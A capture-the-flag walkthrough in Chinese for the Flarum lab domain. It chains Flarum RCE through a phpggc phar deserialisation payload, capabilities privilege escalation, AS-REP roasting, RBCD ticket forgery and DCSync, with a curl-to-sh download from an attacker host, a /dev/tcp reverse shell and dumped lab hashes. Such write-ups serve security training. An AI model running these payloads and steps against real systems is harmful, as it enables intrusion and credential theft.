Flarum - 春秋云境
靶标介绍:
Flarum 是一套难度为中等的靶场环境,完成该挑战可以帮助玩家了解内网渗透中的代理转发、内网扫描、信息收集、kerberos 协议以及横向移动技术方法,加强对域环境核心认证机制的理解,以及掌握域环境渗透中一些有趣的技术要点。该靶场共有 4 个 flag,分布于不同的靶机。
| 内网地址 | Host or FQDN | 简要描述 |
|---|---|---|
| 172.22.60.52 | web01 | 外网 Flarum CMS |
| 172.22.60.15 | PC1.xiaorang.lab | 存在 Xshell 客户端的主机 |
| 172.22.60.42 | Fileserver.xiaorang.lab | 有 DCSync 权限的主机 |
| 172.22.60.8 | DC.xiaorang.lab | 域控制器 |
第 1 关
关卡剧情:
请测试 Flarum 社区后台登录口令的安全性,并获取在该服务器上执行任意命令的能力。
探测端口:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
[root@kali ~]# nmap --reason -p- --min-rate 10000 -oN nmap.txt xx.xx.xx.xx
Starting Nmap 7.70 ( https://nmap.org ) at 2023-08-16 11:40 CST
Nmap scan report for xx.xx.xx.xx
Host is up, received echo-reply ttl 250 (0.042s latency).
Not shown: 65533 closed ports
Reason: 65533 resets
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 250
80/tcp open http syn-ack ttl 250
Nmap done: 1 IP address (1 host up) scanned in 34.64 seconds
[root@kali ~]# nmap -p 22,80 -sCV -oN nmap.txt xx.xx.xx.xx
Starting Nmap 7.70 ( https://nmap.org ) at 2023-08-16 11:41 CST
Nmap scan report for xx.xx.xx.xx
Host is up (0.039s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.52 ((Ubuntu))
|_http-server-header: Apache/2.4.52 (Ubuntu)
|_http-title: \xE9\x9C\x84\xE5\xA3\xA4\xE7\xA4\xBE\xE5\x8C\xBA
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.74 seconds
用 rockyou.txt 跑后台登录口令:administrator/1chris
之后的步骤根据 phith0n 师傅的文章“从偶遇 Flarum 开始的 RCE 之旅” 进行操作。
生成 payload:
1
2
3
┌──(root㉿kali)-[/opt/phpggc]
└─# php phpggc -p tar -b Monolog/RCE6 system "curl atk_vps_ip:8000/1.txt|sh"
dGVzdC50eHQAAAAAAAAAAAAAA...
注:这里反弹 shell 需要主机,从攻击机的 web 服务加载 bash 脚本来执行,才能成功反弹 shell。
执行反弹 shell 的 bash 脚本 1.txt 的内容:
1
bash -c 'sh -i >& /dev/tcp/xx.xx.xx.xx/12345 0>&1'
在后台“编辑自定义 CSS”区域,写入:
1
@import (inline) "data:text/css;base64,dGVzdC50eHQAAAAAAA...";
访问 CSS 地址,查看是否写入成功:
再修改自定义 CSS,使用 phar 协议包含这个文件(相对路径),成功触发反序列化,执行命令:
1
2
3
.test {
content: data-uri("phar://./assets/forum.css");
}
如果保存按钮一直在转圈,就表示正在弹 shell 了:
攻击机成功接收到 shell,但没有读取 flag 文件的权限:
1
2
3
4
5
6
7
8
9
10
11
12
[root@kali ~]# nc -lvvp 12345
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Listening on :::12345
Ncat: Listening on 0.0.0.0:12345
Ncat: Connection from xx.xx.xx.xx.
Ncat: Connection from xx.xx.xx.xx:57430.
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$ hostname
web01
$
查找具有 capabilities 权限属性的二进制文件:
1
2
3
4
5
6
7
$ getcap -r / 2>/dev/null
/snap/core20/1974/usr/bin/ping cap_net_raw=ep
/snap/core20/1405/usr/bin/ping cap_net_raw=ep
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper cap_net_bind_service,cap_net_admin=ep
/usr/bin/openssl =ep
/usr/bin/mtr-packet cap_net_raw=ep
/usr/bin/ping cap_net_raw=ep
capabilities 提权,利用 openssl 开启一个本地 web 服务来读取文件:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
$ openssl req -x509 -newkey rsa:2048 -keyout /tmp/key.pem -out /tmp/cert.pem -days 365 -nodes
.+.......+..+...+...+.......+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++*.....+.................+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++*..+...+............+......+........+.+...+.....................+.................+...............+.............+.........+.....+...+...+....+......+..+....+...+.....+......+.+...............+.....+.+.........+...+..+.+........+....+.....+....................................+.......+..+.............+............+..+.........+.+.....+.........+......+.+..+...+............+.......+...+...+..+......+.......+...+......+........+.+..+.......+...........+......+.+..............+.+.........+...+..+....+...............+..+...+.........+......+......+.+...............+..+.......+...+...........+......+.+.....+....+........+......+.......+..+.+.....+.+.....+....+...........+....+..+....+.....+.+..+...+.......+....................+.+......+..............+.+...+...+...+.........+...+...............+...+.................+.......+..+....+.....+..........+...............+.........+...+...+..+....+...+..+..........+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
....+..................+...+...........+.+...+......+...+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++*..+....+...+...+...+.........+..+.+..+.+.....+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++*......+.+.....+.+........+............+....+..+...+.......+.........+...........+....+...+............+.....+.+.........+.........+...........+.+..+..........+...+...+..+.........+.+.....+............+.+......+...........+...+.........+.............+..+...+...+.+........+...+..........+............+..+......+.........+....+...............+.........+..+..................+...+....+...+..+......+...+....+..+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
-----
You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter '.', the field will be left blank.
-----
Country Name (2 letter code) [AU]:
State or Province Name (full name) [Some-State]:
Locality Name (eg, city) []:
Organization Name (eg, company) [Internet Widgits Pty Ltd]:
Organizational Unit Name (eg, section) []:
Common Name (e.g. server FQDN or YOUR name) []:
Email Address []:
$ pwd
/
$ openssl s_server -key /tmp/key.pem -cert /tmp/cert.pem -port 8080 -HTTP
Using default temp DH parameters
ACCEPT
在被控机器上,访问本机的 web 服务来读取文件:
1
2
3
4
5
6
7
8
9
10
11
12
$ curl --http0.9 -k "https://127.0.0.1:8080/root/flag/flag01.txt"
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 496 0 496 0 0 71925 0 --:--:-- --:--:-- --:--:-- 82666
_ _ _ _
___ ___ _ __ __ _ _ __ __ _| |_ _ _| | __ _| |_(_) ___ _ __ ___
/ __/ _ \| '_ \ / _` | '__/ _` | __| | | | |/ _` | __| |/ _ \| '_ \/ __|
| (_| (_) | | | | (_| | | | (_| | |_| |_| | | (_| | |_| | (_) | | | \__ \
\___\___/|_| |_|\__, |_| \__,_|\__|\__,_|_|\__,_|\__|_|\___/|_| |_|___/
|___/
flag01: flag{d0267667-d2c3-4415-b56c-4ee33e1d46c9}
第 2 关
关卡剧情:
通过 kerberos 攻击的获取域内权限,并进行信息收集。
在后台可以查看到有许多用户和邮箱: 
查看配置文件获取数据库的账号密码:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
$ cat /var/www/html/config.php
<?php return array (
'debug' => false,
'database' =>
array (
'driver' => 'mysql',
'host' => 'localhost',
'port' => 3306,
'database' => 'flarum',
'username' => 'root',
'password' => 'Mysql@root123',
'charset' => 'utf8mb4',
'collation' => 'utf8mb4_unicode_ci',
'prefix' => 'flarum_',
'strict' => false,
'engine' => 'InnoDB',
'prefix_indexes' => true,
),
'url' => 'http://'.$_SERVER['HTTP_HOST'],
'paths' =>
array (
'api' => 'api',
'admin' => 'admin',
),
'headers' =>
array (
'poweredByHeader' => true,
'referrerPolicy' => 'same-origin',
),
);
连接数据库,将这些用户信息全都导出来: 
域用户名枚举:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
$ ./kerbrute_linux_amd64 userenum --dc 172.22.60.8 -d xiaorang.lab user.txt
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 08/16/23 - Ronnie Flathers @ropnop
2023/08/16 23:21:30 > Using KDC(s):
2023/08/16 23:21:30 > 172.22.60.8:88
2023/08/16 23:21:30 > [+] VALID USERNAME: administrator@xiaorang.lab
2023/08/16 23:21:30 > [+] VALID USERNAME: yangyan@xiaorang.lab
2023/08/16 23:21:30 > [+] VALID USERNAME: zhanghao@xiaorang.lab
2023/08/16 23:21:30 > [+] VALID USERNAME: chenfang@xiaorang.lab
2023/08/16 23:21:30 > [+] VALID USERNAME: zhangwei@xiaorang.lab
2023/08/16 23:21:30 > [+] VALID USERNAME: wangping@xiaorang.lab
2023/08/16 23:21:30 > [+] VALID USERNAME: wangkai@xiaorang.lab
2023/08/16 23:21:30 > [+] VALID USERNAME: zhangxin@xiaorang.lab
2023/08/16 23:21:30 > [+] VALID USERNAME: wangyun@xiaorang.lab
2023/08/16 23:21:30 > Done! Tested 246 usernames (9 valid) in 0.039 seconds
使用 AS-REP Roasting 获取配置了 “不需要 Kerberos 预身份验证” 的用户响应,再使用 hashcat 进行离线爆破:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
┌──(root㉿kali)-[~]
└─# proxychains4 -q impacket-GetNPUsers xiaorang.lab/ -dc-ip 172.22.60.8 -usersfile user.txt -format hashcat -outputfile hashes.txt
Impacket v0.11.0 - Copyright 2023 Fortra
[-] User administrator@xiaorang.lab doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User yangyan@xiaorang.lab doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User zhanghao@xiaorang.lab doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User chenfang@xiaorang.lab doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User zhangwei@xiaorang.lab doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User wangping@xiaorang.lab doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User wangkai@xiaorang.lab doesn't have UF_DONT_REQUIRE_PREAUTH set
┌──(root㉿kali)-[~]
└─# cat hashes.txt
$krb5asrep$23$zhangxin@xiaorang.lab@XIAORANG.LAB:74da44061de3fcddd20bc328f32357e6$f4e3faa0f23a372b809313d94cfe04c423b0bf1950813a9a642007be949d625e160c0ff0d2e93a9a7ef8ea69b112ad6a86d494ae4c59fea203b04fad8708b5c6e192885b70e1d6bd7f51656fe0aa217c7b12f303d5af8bdd539904b0f1cb21dffa846439c1d0ba5e8badd00cc3ba9208e060fa430e3d4688abac43e3ecc4a14e0a683561e2da50dbf063adfb149e41c2c29e5f3fd4ec96c86adb5fe29fea60adfa4535c0b4ca99ac8aead814b17d047331ab16b94a4cfc25752d1a9c0898bc70b407a575d57be061e6d6be2e30afcc09aa9067022ebd92d58e17cd0b67f9fda85575bf7d8c99f75fe0a36972
$krb5asrep$23$wangyun@xiaorang.lab@XIAORANG.LAB:bedfc449e6105f699c5e642d3d5c07a5$a68e295c7c2c294830cd19d8b7e2412733debf965ece8226a3f6f31c9a2df81a6f875e08d85d05e3ec8d3c3be7efd7dc5a35494381b08c6d596bfa1e34b3cc535906b7a7b8ddf27661ae26f2de31151b42d087c21bdf1882d84556d812b65df3a3084f8abfc8edf835538a842a4368e35459cebf9e673f07780331b6849ece509dffd4faad0bb4df5243e049227e13442c7a2668962a52b00bed55a8783cfe0243881959d345efd4d134eb7df81a4b87f1c7358fd943c6294ed55131f7c19b4ec81b07a3782748d8c840d184ca98db97e24f1cbf4f763aa0ac26cea81cd1894944db0ef6304e7e84c48677ef
┌──(root㉿kali)-[~]
└─# hashcat -m 18200 hashes.txt /usr/share/wordlists/rockyou.txt --show
$krb5asrep$23$wangyun@xiaorang.lab@XIAORANG.LAB:bedfc449e6105f699c5e642d3d5c07a5$a68e295c7c2c294830cd19d8b7e2412733debf965ece8226a3f6f31c9a2df81a6f875e08d85d05e3ec8d3c3be7efd7dc5a35494381b08c6d596bfa1e34b3cc535906b7a7b8ddf27661ae26f2de31151b42d087c21bdf1882d84556d812b65df3a3084f8abfc8edf835538a842a4368e35459cebf9e673f07780331b6849ece509dffd4faad0bb4df5243e049227e13442c7a2668962a52b00bed55a8783cfe0243881959d345efd4d134eb7df81a4b87f1c7358fd943c6294ed55131f7c19b4ec81b07a3782748d8c840d184ca98db97e24f1cbf4f763aa0ac26cea81cd1894944db0ef6304e7e84c48677ef:Adm12geC
该域用户凭据可以登录 PC1$ 主机:
1
2
3
4
5
6
7
8
┌──(root㉿kali)-[~]
└─# proxychains4 -q cme rdp 172.22.60.52/24 -u wangyun -p Adm12geC
RDP 172.22.60.42 3389 Fileserver [*] Windows 10 or Windows Server 2016 Build 17763 (name:Fileserver) (domain:xiaorang.lab) (nla:True)
RDP 172.22.60.8 3389 DC [*] Windows 10 or Windows Server 2016 Build 17763 (name:DC) (domain:xiaorang.lab) (nla:True)
RDP 172.22.60.15 3389 PC1 [*] Windows 10 or Windows Server 2016 Build 17763 (name:PC1) (domain:xiaorang.lab) (nla:True)
RDP 172.22.60.42 3389 Fileserver [-] xiaorang.lab\wangyun:Adm12geC
RDP 172.22.60.8 3389 DC [+] xiaorang.lab\wangyun:Adm12geC
RDP 172.22.60.15 3389 PC1 [+] xiaorang.lab\wangyun:Adm12geC (Pwn3d!)
登录用户桌面后,在 Xshell 中找到用户密码并解密,获取到 zhangxin/admin4qwY38cc 用户凭据: 
域环境信息收集:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
┌──(root㉿kali)-[~]
└─# proxychains4 -q bloodhound-python -u wangyun -p Adm12geC -d xiaorang.lab -dc DC.xiaorang.lab -ns 172.22.60.8 -c all --auth-method ntlm --dns-tcp --zip
INFO: Found AD domain: xiaorang.lab
INFO: Connecting to LDAP server: DC.xiaorang.lab
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 4 computers
INFO: Connecting to LDAP server: DC.xiaorang.lab
INFO: Found 12 users
INFO: Found 52 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer:
INFO: Querying computer: fileserver.xiaorang.lab
INFO: Querying computer: PC1.xiaorang.lab
INFO: Querying computer: DC.xiaorang.lab
WARNING: DCE/RPC connection failed: SMB SessionError: STATUS_TRUSTED_RELATIONSHIP_FAILURE(The logon request failed because the trust relationship between this workstation and the primary domain failed.)
WARNING: DCE/RPC connection failed: SMB SessionError: STATUS_TRUSTED_RELATIONSHIP_FAILURE(The logon request failed because the trust relationship between this workstation and the primary domain failed.)
WARNING: DCE/RPC connection failed: SMB SessionError: STATUS_TRUSTED_RELATIONSHIP_FAILURE(The logon request failed because the trust relationship between this workstation and the primary domain failed.)
WARNING: DCE/RPC connection failed: SMB SessionError: STATUS_TRUSTED_RELATIONSHIP_FAILURE(The logon request failed because the trust relationship between this workstation and the primary domain failed.)
WARNING: DCE/RPC connection failed: SMB SessionError: STATUS_TRUSTED_RELATIONSHIP_FAILURE(The logon request failed because the trust relationship between this workstation and the primary domain failed.)
INFO: Done in 00M 08S
INFO: Compressing output into 20230816233442_bloodhound.zip
zhangxin@xiaorang.lab 用户属于 Account Operators 组的成员: 
Account Operators 组向用户授予有限的帐户创建权限。此组的成员可以创建和修改大多数类型的帐户,包括用户帐户、本地组和全局组。 组成员可以本地登录到域控制器。 
注:Account Operators 组的成员无法管理 Administrator 用户帐户、管理员的用户帐户或 Administrators、Server Operators、Account Operators、Backup Operators 或 Print Operators 组。
此时可以通过 rbcd 获取主机 PC1$ 的 SYSTEM 权限,获取 flag:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
┌──(root㉿kali)-[~]
└─# proxychains4 -q impacket-wmiexec xiaorang.lab/Administrator@172.22.60.15 -hashes :c3cfdc08527ec4ab6aa3e630e79d349b -codec GBK -shell-type powershell
Impacket v0.11.0 - Copyright 2023 Fortra
[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
PS C:\> type C:\Users\Administrator\flag\flag02.txt
d88888b db .d8b. d8888b. db db .88b d88.
88' 88 d8' `8b 88 `8D 88 88 88'YbdP`88
88ooo 88 88ooo88 88oobY' 88 88 88 88 88
88~~~ 88 88~~~88 88`8b 88 88 88 88 88
88 88booo. 88 88 88 `88. 88b d88 88 88 88
YP Y88888P YP YP 88 YD ~Y8888P' YP YP YP
flag02: flag{286a43d1-0057-4d82-9eb0-31e4a39dcf4a}
PS C:\>
注:这里并没有使用 rbcd 去打 PC1 主机,而是在获取了域管权限后再回来查看的 flag。因为根据 bloodhound 的分析结果,无论是否获取到 PC1 主机的 SYSTEM 权限对后续的域渗透都没有影响。
第 3 关
关卡剧情:
请尝试获取内网中 Fileserver 主机的权限,并发现黑客留下的域控制器后门。
ACCOUNT OPERATORS 组的成员 ZHANGXING@XIAORANG.LAB 对主机 FILESERVER$ 具有完全控制权限。此时可以通过配置 RBCD 来获取主机 FILESERVER$ 的 SYSTEM 权限。
添加机器用户:
1
2
3
4
5
┌──(root㉿kali)-[~]
└─# proxychains4 -q impacket-addcomputer 'xiaorang.lab/zhangxin:admin4qwY38cc' -computer-name 'EVILCOMPUTER$' -computer-pass 'p@ssw0rd' -dc-ip 172.22.60.8
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Successfully added machine account EVILCOMPUTER$ with password p@ssw0rd.
配置 RBCD:
1
2
3
4
5
6
7
8
9
┌──(root㉿kali)-[~]
└─# proxychains4 -q impacket-rbcd 'xiaorang.lab/zhangxin:admin4qwY38cc' -action write -delegate-from 'EVILCOMPUTER$' -delegate-to 'FILESERVER$' -dc-ip 172.22.60.8
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty
[*] Delegation rights modified successfully!
[*] EVILCOMPUTER$ can now impersonate users on FILESERVER$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*] EVILCOMPUTER$ (S-1-5-21-3535393121-624993632-895678587-1116)
伪造域管权限的服务票据:
1
2
3
4
5
6
7
8
9
10
┌──(root㉿kali)-[~]
└─# proxychains4 -q impacket-getST xiaorang.lab/EVILCOMPUTER$:'p@ssw0rd' -spn cifs/FILESERVER.xiaorang.lab -impersonate administrator -dc-ip 172.22.60.8
Impacket v0.11.0 - Copyright 2023 Fortra
[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in administrator.ccache
获取主机 SYSTEM 权限 shell:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
┌──(root㉿kali)-[~]
└─# export KRB5CCNAME=administrator.ccache
┌──(root㉿kali)-[~]
└─# proxychains4 -q impacket-smbexec 'xiaorang.lab/administrator@FILESERVER.xiaorang.lab' -target-ip 172.22.60.42 -codec gbk -shell-type powershell -no-pass -k
Impacket v0.11.0 - Copyright 2023 Fortra
[!] Launching semi-interactive shell - Careful what you execute
PS C:\Windows\system32> type C:\Users\Administrator\flag\flag03.txt
________ __
|_ __ |[ |
| |_ \_| | | ,--. _ .--. __ _ _ .--..--.
| _| | | `'_\ : [ `/'`\][ | | | [ `.-. .-. |
_| |_ | | // | |, | | | \_/ |, | | | | | |
|_____| [___]\'-;__/[___] '.__.'_/[___||__||__]
flag03: flag{62e4b31e-bcea-4115-b328-e3d7cb324183}
PS C:\Windows\system32>
第 4 关
关卡剧情:
请尝试利用黑客留下的域控制器后门获取域控的权限。
主机 FILESERVER$ 被添加到 DOMAIN CONTROLLERS 和 ENTERPRISE DOMAIN CONTROLLERS 组中,可以直接对域控进行 DCSync 攻击。
获取主机 FILESERVER$ 的凭据:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
┌──(root㉿kali)-[~]
└─# proxychains4 -q impacket-secretsdump xiaorang.lab/administrator@FILESERVER.xiaorang.lab -target-ip 172.22.60.42 -no-pass -k
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0xef418f88c0327e5815e32083619efdf5
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:bd8e2e150f44ea79fff5034cad4539fc:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:b40dda6fd91a2212d118d83e94b61b11:::
[*] Dumping cached domain logon information (domain/username:hash)
XIAORANG.LAB/Administrator:$DCC2$10240#Administrator#f9224930044d24598d509aeb1a015766: (2023-08-02 07:52:21)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
XIAORANG\Fileserver$:plain_password_hex:3000310078005b003b0049004e003500450067003e00300039003f0074006c00630024003500450023002800220076003c004b0057005e0063006b005100580024007300620053002e0038002c0060003e00420021007200230030003700470051007200640054004e0078006000510070003300310074006d006b004c002e002f0059003b003f0059002a005d002900640040005b0071007a0070005d004000730066006f003b0042002300210022007400670045006d0023002a002800330073002c00320063004400720032002f003d0078006a002700550066006e002f003a002a0077006f0078002e0066003300
XIAORANG\Fileserver$:aad3b435b51404eeaad3b435b51404ee:951d8a9265dfb652f42e5c8c497d70dc:::
[*] DPAPI_SYSTEM
dpapi_machinekey:0x15367c548c55ac098c599b20b71d1c86a2c1f610
dpapi_userkey:0x28a7796c724094930fc4a3c5a099d0b89dccd6d1
[*] NL$KM
0000 8B 14 51 59 D7 67 45 80 9F 4A 54 4C 0D E1 D3 29 ..QY.gE..JTL...)
0010 3E B6 CC 22 FF B7 C5 74 7F E4 B0 AD E7 FA 90 0D >.."...t........
0020 1B 77 20 D5 A6 67 31 E9 9E 38 DD 95 B0 60 32 C4 .w ..g1..8...`2.
0030 BE 8E 72 4D 0D 90 01 7F 01 30 AC D7 F8 4C 2B 4A ..rM.....0...L+J
NL$KM:8b145159d76745809f4a544c0de1d3293eb6cc22ffb7c5747fe4b0ade7fa900d1b7720d5a66731e99e38dd95b06032c4be8e724d0d90017f0130acd7f84c2b4a
[*] Cleaning up...
[*] Stopping service RemoteRegistry
进行 DCSync 攻击:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
┌──(root㉿kali)-[~]
└─# proxychains4 -q impacket-secretsdump 'xiaorang.lab/Fileserver$@DC.xiaorang.lab' -target-ip 172.22.60.8 -dc-ip 172.22.60.8 -hashes :951d8a9265dfb652f42e5c8c497d70dc -just-dc-ntlm -user-status
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c3cfdc08527ec4ab6aa3e630e79d349b::: (status=Enabled)
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: (status=Disabled)
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:98194d49adfe247020eaade4a3936d95::: (status=Disabled)
chenfang:1105:aad3b435b51404eeaad3b435b51404ee:302b5743b0f7b3436591aedf550ded5b::: (status=Enabled)
zhanghao:1106:aad3b435b51404eeaad3b435b51404ee:4c37e7a022daf856bfa2b16824696ab5::: (status=Enabled)
wangyun:1107:aad3b435b51404eeaad3b435b51404ee:561d64b9a1c943db32810fb5586a4be9::: (status=Enabled)
zhangwei:1108:aad3b435b51404eeaad3b435b51404ee:3d2f864635abb31f2546dc07cbcd2528::: (status=Enabled)
wangkai:1109:aad3b435b51404eeaad3b435b51404ee:d20a47a4529552805d96a24c3020384c::: (status=Enabled)
yangyan:1110:aad3b435b51404eeaad3b435b51404ee:4f80f967fd586f4212bc264a7d1f6789::: (status=Enabled)
zhangxin:1111:aad3b435b51404eeaad3b435b51404ee:38780e101b28bb9b9036fc3e2e4f35e6::: (status=Enabled)
wangping:1112:aad3b435b51404eeaad3b435b51404ee:0adf6fb0f808be95d449e3b6c67b02dc::: (status=Enabled)
DC$:1000:aad3b435b51404eeaad3b435b51404ee:b35cdb9341faa18661a2a63b3a28feb7::: (status=Enabled)
PC1$:1103:aad3b435b51404eeaad3b435b51404ee:6f1b93a305b2c1eacb59d6562b968ef6::: (status=Enabled)
FILESERVER$:1114:aad3b435b51404eeaad3b435b51404ee:951d8a9265dfb652f42e5c8c497d70dc::: (status=Enabled)
EVILCOMPUTER$:1116:aad3b435b51404eeaad3b435b51404ee:de26cce0356891a4a020e7c4957afc72::: (status=Enabled)
[*] Cleaning up...
PTH 登录域控:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
┌──(root㉿kali)-[~]
└─# proxychains4 -q impacket-wmiexec xiaorang.lab/Administrator@172.22.60.8 -hashes :c3cfdc08527ec4ab6aa3e630e79d349b -codec GBK -shell-type powershell
Impacket v0.11.0 - Copyright 2023 Fortra
[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
PS C:\> type C:\Users\Administrator\flag\flag04.txt
:::===== ::: :::==== :::==== ::: === :::=======
::: ::: ::: === ::: === ::: === ::: === ===
====== === ======== ======= === === === === ===
=== === === === === === === === === ===
=== ======== === === === === ====== === ===
flag04: flag{928d5edc-3678-40f2-a6bd-24643c3040e9}
PS C:\>
本文由作者按照 CC BY 4.0 进行授权